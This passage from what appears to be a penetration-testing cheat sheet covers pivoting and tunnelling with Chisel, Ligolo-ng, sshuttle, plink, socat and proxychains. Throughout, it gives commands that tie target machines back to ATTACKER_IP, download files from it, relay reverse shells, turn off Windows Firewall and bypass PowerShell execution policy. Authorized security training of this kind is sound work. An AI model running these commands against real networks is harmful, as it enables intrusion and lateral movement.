# Preferences -> Network Settings -> Manual proxy 1060 # SOCKS Host: 127.0.0.1, Port: 1080, SOCKS v5 1061 # Browse to http://192.168.5.50 1062 ``` 1063 1064 ### Scenario 8: RDP to Windows Machine in Internal Network 1065 1066 **Situation:** Windows Server at 10.10.50.10, need RDP access 1067 1068 **Solution 1: Through SOCKS Proxy** 1069 ```bash 1070 # Setup Chisel tunnel 1071 ./chisel server -p 8080 --reverse 1072 ./chisel client ATTACKER_IP:8080 R:1080:socks 1073 1074 # Use proxychains with RDP client 1075 proxychains4 xfreerdp /v:10.10.50.10 /u:administrator /p:password /cert-ignore 1076 ``` 1077 1078 **Solution 2: Direct Port Forward** 1079 ```bash 1080 # Chisel reverse port forward 1081 ./chisel client ATTACKER_IP:8080 R:3389:10.10.50.10:3389 1082 1083 # Direct RDP connection 1084 xfreerdp /v:127.0.0.1:3389 /u:administrator /p:password 1085 ``` 1086 1087 --- 1088 1089 ## Tool Selection Guide 1090 1091 ### When to Use Each Tool 1092 1093 #### Use LIGOLO-NG when: 1094 - You need full network access (scanning, multiple services) 1095 - Want transparent access without SOCKS/proxychains 1096 - Have ability to upload agent binary 1097 - Need clean, VPN-like experience 1098 - Working with multiple nested networks 1099 - Performance matters (faster than SOCKS) 1100 1101 #### Use CHISEL when: 1102 - Need quick SOCKS proxy setup 1103 - Working through HTTP-only egress 1104 - Want to forward specific ports 1105 - Can't use SSH 1106 - Need cross-platform support 1107 - Working on HTB/CTF (widely supported) 1108 1109 #### Use SSHUTTLE when: 1110 - Target already has SSH running 1111 - Don't want to upload any tools 1112 - Need quick, transparent VPN-like access 1113 - Working on Linux/Mac 1114 - Want simple solution without agents 1115 1116 #### Use PLINK when: 1117 - Target is Windows 1118 - SSH server available on attacker 1119 - Can't upload other tools (plink is well-known, less suspicious) 1120 - Need quick reverse tunnel 1121 - Working with older Windows systems 1122 1123 #### Use SOCAT when: 1124 - Need encrypted tunnels (OpenSSL) 1125 - Creating relay points 1126 - Upgrading reverse shells to TTY 1127 - Need UDP forwarding 1128 - Want flexibility for custom scenarios 1129 1130 #### Use NETCAT when: 1131 - Just need basic port forwarding 1132 - Creating simple relays 1133 - Quick file transfers 1134 - Testing connectivity 1135 - Available on target (often pre-installed) 1136 1137 #### Use PROXYCHAINS when: 1138 - Already have SOCKS proxy (Chisel, SSH) 1139 - Need to route tools that don't support proxies 1140 - Want to chain multiple proxies 1141 - Working with scanners/exploit tools 1142 1143 ### Decision Tree 1144 1145 ``` 1146 Do you have SSH access on target? 1147 ├── YES: Use SSHuttle (simplest) or SSH tunneling 1148 └── NO: Continue... 1149 1150 Can you upload custom binaries? 1151 ├── YES: Continue... 1152 │ ├── Need VPN-like full network access? 1153 │ │ └── YES: Use Ligolo-ng (best performance) 1154 │ └── Need SOCKS proxy or port forward? 1155 │ └── YES: Use Chisel (most versatile) 1156 └── NO: Continue... 1157 ├── Windows target? 1158 │ ├── Plink available? -> Use Plink 1159 │ └── Use netsh portproxy (built-in) 1160 └── Linux/Unix target? 1161 ├── Netcat available? -> Use Netcat relay 1162 ├── Socat available? -> Use Socat 1163 └── Bash only? -> Use /dev/tcp relay 1164 ``` 1165 1166 ### Performance Comparison 1167 1168 | Tool | Speed | Latency | Resource Usage | Stealth | 1169 |------|-------|---------|----------------|---------| 1170 | Ligolo-ng | Excellent | Low | Low | High | 1171 | SSHuttle | Very Good | Low | Low | Very High | 1172 | Chisel | Good | Medium | Low | Medium | 1173 | SSH Tunnels | Very Good | Low | Low | Very High | 1174 | Socat | Good | Low | Very Low | High | 1175 | Netcat | Fair | Medium | Very Low | Medium | 1176 1177 --- 1178 1179 ## Troubleshooting 1180 1181 ### Chisel Issues 1182 1183 **Problem: Client connects but SOCKS proxy doesn't work** 1184 ```bash 1185 # Check if server is running with --reverse flag 1186 ./chisel server -p 8080 --reverse 1187 1188 # Verify SOCKS port is listening on attacker 1189 ss -tlnp | grep 1080 1190 1191 # Test SOCKS proxy 1192 curl --socks5 127.0.0.1:1080 http://internal-host 1193 ``` 1194 1195 **Problem: Connection refused / Can't connect** 1196 ```bash 1197 # Check firewall on attacker 1198 sudo ufw allow 8080/tcp 1199 1200 # Verify chisel is listening 1201 ss -tlnp | grep 8080 1202 1203 # Try different port (maybe 8080 is blocked) 1204 ./chisel server -p 443 --reverse 1205 ``` 1206 1207 ### Ligolo-ng Issues 1208 1209 **Problem: TUN interface not created** 1210 ```bash 1211 # Linux - create manually 1212 sudo ip tuntap add user $(whoami) mode tun ligolo 1213 sudo ip link set ligolo up 1214 1215 # Check if interface exists 1216 ip addr show ligolo 1217 1218 # macOS - install tuntap 1219 brew install --cask tuntap 1220 ``` 1221 1222 **Problem: Can't add routes / routes not working** 1223 ```bash 1224 # Check if tunnel is started 1225 # In ligolo console: start 1226 1227 # Verify route 1228 ip route | grep ligolo 1229 1230 # Check if interface is UP 1231 ip link show ligolo 1232 1233 # Try deleting and re-adding route 1234 sudo ip route del 10.10.10.0/24 dev ligolo 1235 sudo ip route add 10.10.10.0/24 dev ligolo 1236 ``` 1237 1238 **Problem: Agent won't connect** 1239 ```bash 1240 # Check firewall 1241 sudo ufw allow 11601/tcp 1242 1243 # Verify proxy is listening 1244 ss -tlnp | grep 11601 1245 1246 # Try binding to specific IP 1247 ./proxy -selfcert -laddr 0.0.0.0:11601 1248 1249 # On agent, try explicit bind 1250 ./agent -connect ATTACKER_IP:11601 -ignore-cert -bind 0.0.0.0 1251 ``` 1252 1253 ### SSH / SSHuttle Issues 1254 1255 **Problem: SSHuttle connection drops** 1256 ```bash 1257 # Use --no-latency-control 1258 sshuttle -r user@host 10.10.10.0/24 --no-latency-control 1259 1260 # Check SSH connection stability 1261 ssh user@host 'while true; do date; sleep 5; done' 1262 ``` 1263 1264 **Problem: SSH password authentication failed** 1265 ```bash 1266 # Enable password auth on SSH server 1267 sudo vim /etc/ssh/sshd_config 1268 # Set: PasswordAuthentication yes 1269 sudo systemctl restart sshd 1270 ``` 1271 1272 ### Proxychains Issues 1273 1274 **Problem: DNS leaks / DNS not working** 1275 ```bash 1276 # In /etc/proxychains4.conf, ensure: 1277 proxy_dns 1278 1279 # Or add to config: 1280 proxy_dns_old # Use old method if new one fails 1281 ``` 1282 1283 **Problem: Tool doesn't work with proxychains** 1284 ```bash 1285 # Some tools don't support SOCKS proxying 1286 # Workaround: Use Ligolo-ng or SSHuttle instead 1287 1288 # For nmap, always use: 1289 proxychains4 nmap -sT -Pn target 1290 # -sT: TCP connect (required) 1291 # -Pn: Skip ping (ICMP doesn't work through SOCKS) 1292 ``` 1293 1294 **Problem: "ERROR: ld.so: object 'libproxychains.so.3'"** 1295 ```bash 1296 # Find correct library 1297 find /usr -name "libproxychains*" 1298 1299 # Update config with correct path 1300 sudo vim /etc/proxychains4.conf 1301 # Update: /usr/lib/libproxychains4.so (or wherever it is) 1302 ``` 1303 1304 ### Windows Specific Issues 1305 1306 **Problem: PowerShell execution policy blocks scripts** 1307 ```powershell 1308 # Bypass execution policy 1309 powershell -ExecutionPolicy Bypass -File script.ps1 1310 1311 # Or set for current session 1312 Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass 1313 ``` 1314 1315 **Problem: Windows Firewall blocks tunneling tools** 1316 ```cmd 1317 # Disable firewall (if you have admin) 1318 netsh advfirewall set allprofiles state off 1319 1320 # Or add specific rule 1321 netsh advfirewall firewall add rule name="Chisel" dir=in action=allow program="C:\Temp\chisel.exe" 1322 ``` 1323 1324 **Problem: Plink asks to cache host key (breaks automation)** 1325 ```cmd 1326 # Auto-accept with echo 1327 echo y | plink.exe -R 9999:127.0.0.1:80 user@ATTACKER_IP -pw password 1328 1329 # Or use -batch flag (doesn't prompt) 1330 plink.exe -batch -R 9999:127.0.0.1:80 user@ATTACKER_IP -pw password 1331 ``` 1332 1333 ### General Networking Issues 1334 1335 **Problem: Can't reach internal network after setting up tunnel** 1336 ```bash 1337 # Check routing table 1338 ip route # Linux 1339 route print # Windows 1340 netstat -nr # macOS 1341 1342 # Verify tunnel interface is UP 1343 ip addr show 1344 1345 # Test connectivity 1346 ping INTERNAL_IP 1347 traceroute INTERNAL_IP 1348 1349 # Check if packet forwarding is enabled (Linux) 1350 sysctl net.ipv4.ip_forward # Should be 1 1351 sudo sysctl -w net.ipv4.ip_forward=1 1352 ``` 1353 1354 **Problem: Slow tunnel performance** 1355 ```bash 1356 # For SSH-based tunnels, enable compression 1357 ssh -C -D 1080 user@host 1358 1359 # For Chisel, try different port (avoid port 80/443 if proxy interferes) 1360 ./chisel server -p 9999 --reverse 1361 1362 # For Ligolo-ng, check MTU settings 1363 # Reduce MTU if needed 1364 sudo ip link set ligolo mtu 1400 1365 ``` 1366 1367 **Problem: Firewall blocks outbound connections** 1368 ```bash 1369 # Try common allowed ports 1370 # 80 (HTTP), 443 (HTTPS), 53 (DNS), 22 (SSH) 1371 1372 # Chisel over HTTPS port 1373 ./chisel server -p 443 --reverse 1374 1375 # Ligolo-ng over HTTPS 1376 ./proxy -selfcert -laddr 0.0.0.0:443 1377 1378 # SSH over 443 1379 ssh -p 443 user@host 1380 ``` 1381 1382 --- 1383 1384 ## Quick Command Reference 1385 1386 ### Most Common Commands 1387 1388 ```bash 1389 # Quick SOCKS proxy with Chisel 1390 ./chisel server -p 8080 --reverse # Attacker 1391 ./chisel client ATTACKER_IP:8080 R:1080:socks # Target 1392 1393 # Ligolo-ng full tunnel 1394 ./proxy -selfcert -laddr 0.0.0.0:11601 -autoroute # Attacker 1395 ./agent -connect ATTACKER_IP:11601 -ignore-cert # Target 1396 # Then: session 1 -> start 1397 1398 # SSHuttle VPN 1399 sshuttle -r user@pivot 10.0.0.0/8 --dns -vv 1400 1401 # Reverse port forward 1402 ssh -R 8080:localhost:80 user@attacker # SSH 1403 ./chisel client ATTACKER_IP:8080 R:8080:localhost:80 # Chisel 1404 plink.exe -R 8080:localhost:80 user@attacker -pw pass # Plink 1405 1406 # Local port forward 1407 ssh -L 8080:internal-host:80 user@pivot 1408 ./chisel client ATTACKER_IP:8080 L:8080:internal-host:80 1409 1410 # Dynamic SOCKS 1411 ssh -D 1080 user@pivot 1412 ./chisel client ATTACKER_IP:8080 1080:socks 1413 1414 # Using proxychains 1415 proxychains4 nmap -sT -Pn 10.10.10.0/24 1416 proxychains4 firefox 1417 proxychains4 msfconsole 1418 1419 # File transfer 1420 python3 -m http.server 8000 # Attacker 1421 wget http://ATTACKER_IP:8000/file -O /tmp/file # Target Linux 1422 iwr http://ATTACKER_IP:8000/file -o C:\Temp\file # Target Windows 1423 1424 # Reverse shell relay with socat 1425 socat TCP-LISTEN:4444,fork TCP:ATTACKER_IP:4444 # Pivot 1426 # Victim connects to pivot:4444 1427 ``` 1428 1429 --- 1430 1431 ## Additional Resources 1432 1433 ### Port Reference 1434 ``` 1435 Common Tunnel Ports: 1436 - 11601: Ligolo-ng default 1437 - 8080: Chisel default (HTTP alternative) 1438 - 1080: SOCKS proxy standard 1439 - 8888: Alternative HTTP forward 1440 - 9050: Tor SOCKS proxy 1441 - 22: SSH 1442 ``` 1443 1444 ### Testing Connectivity 1445 ```bash 1446 # Check if port is open 1447 nc -zv TARGET_IP PORT 1448 1449 # Check HTTP service 1450 curl -I http://TARGET_IP:PORT 1451 1452 # Check SOCKS proxy 1453 curl --socks5 127.0.0.1:1080 http://target 1454 1455 # Test route 1456 ping TARGET_IP 1457 traceroute TARGET_IP 1458 1459 # Check listening ports on local 1460 ss -tlnp # Linux 1461 netstat -an | find "LISTEN" # Windows 1462 ``` 1463 1464 ### Useful Aliases (Add to ~/.bashrc or ~/.zshrc) 1465 ```bash 1466 # Quick HTTP server 1467 alias serve='python3 -m http.server 8000' 1468 1469 # Quick SOCKS with Chisel 1470 alias chisel-server='~/tools/chisel/chisel server -p 8080 --reverse' 1471 1472 # Proxychains shortcut 1473 alias pc='proxychains4 -q' 1474 1475 # Quick nmap through proxy 1476 alias pcnmap='proxychains4 nmap -sT -Pn' 1477 ``` 1478 1479 --- 1480 1481 **Created for Security Testing & Authorized Penetration Testing Only**